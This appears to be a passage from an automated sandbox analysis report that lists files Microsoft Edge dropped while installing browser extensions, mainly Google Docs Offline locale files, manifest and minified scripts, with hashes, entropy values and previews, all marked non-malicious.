                                                                                                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                      MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                      SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                      SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                      SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1205
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                      MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                      SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                      SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                      SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                      MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                      SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                      SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                      SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                      MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                      SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                      SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                      SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):11280
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                      MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                      SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                      SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                      SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):854
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                      MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                      SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                      SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                      SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2525
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                      MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                      SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                      SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                      SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                      MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                      SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                      SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                      SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):98880
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                      MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                      SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                      SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                      SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):291
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                      MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                      SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                      SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                      SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):107677
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                      MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                      SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                      SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                      SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_857984798\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_857984798\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9815
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                      MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                      SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                      SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                      SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
